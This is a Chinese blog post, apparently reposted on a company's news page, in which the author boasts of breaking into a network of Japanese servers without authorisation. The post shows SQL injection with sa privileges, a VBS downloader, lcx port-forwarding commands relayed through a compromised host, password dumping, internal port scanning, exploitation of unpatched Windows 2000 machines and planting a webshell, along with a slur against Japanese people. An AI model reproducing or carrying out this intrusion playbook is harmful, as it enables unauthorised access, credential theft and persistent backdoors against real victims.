实战渗透日本服务器群

因为这一局，渗透获取整个服务器群的权限，N台服务器。所以写篇文章小小虚荣下。

成都创新互联公司主营乌苏网站建设的网络公司,主营网站建设方案,重庆APP开发公司,乌苏h5微信平台小程序开发搭建,乌苏网站营销推广欢迎乌苏等地区企业咨询

开局：

入手点是一个注射点：sa，内网, 轻车熟路写个vbs脚本，下好lcx，转发端口。

这个下载脚本可以重复使用，也不会暴露我存放工具的地址。（有些下载脚本把下载地址写在里面，个人觉得不很好。）
由于本机连接日本网络比较慢。连拨两个VPN,再登上日本本土的一台肉鸡（我想这样速度不会差了，ps：肉鸡的作用体现出来了）。

加了用户。在肉鸡终端：lcx -listen 520 1982,目标机：lcx -slave myip 520 127.0.0.1 3389
ok,终端里填：127.0.0.1:1982 顺利登陆。

中盘：

win2000系统，mssql server
先抓个系统密码，找下sql密码。查看了下一些信息，并检查是否还有同行的后门，清除之。
分析了下密码:(数字＋机器名＋数字)
其他都是鸟语也看不太明白。载了几个基本工具放个隐藏目录。
ps：一般进去后总得收拾下，最好不要种马。死得快，也易暴露。

这时候就盘算着怎么拿web的权限了。（分析网络拓扑结构了）
先看下网上邻居：
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明显，都是数据库服务器。
再往上一层，又发现一个工作组：
web-k.**.jp
c***oo_db
...
哎，还是数据库服务器。
ipconfig /all
192.168.10.18 只有一个内网ip
ok：s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s扫下内网开80的机子，线程设置为20，讲究精确度嘛。
很遗憾，结果出来的几个机子都是数据库服务器，上面并没有网站。
我就纳闷了，web服务器跑哪了呢？

收官：

翻了一阵子，仔细分析了网络拓扑结构。最后让我找到了：
192.168.1.1-255这段是web服务器群
接下来，用s果然扫出一片。再对应外网ip，挑选溢出的下手对象（192.168.1.19）（倭奴喜欢古董级的win2000，好多补丁都不全，好溢出）
很舒坦地日下来，然后载个webshell放到web目录的偏僻角落。擦擦屁股走人。

ps：图是我溢出另外一台数据库服务器时截下的

【编辑推荐】

1. 中科红旗Linux和日本NEC服务器密切合作
2. 刀片服务器承载IPTV未来

网页名称：实战渗透日本服务器群
新闻来源：http://www.mswzjz.cn/qtweb/news6/237606.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能，是专注品牌与效果的网络营销公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能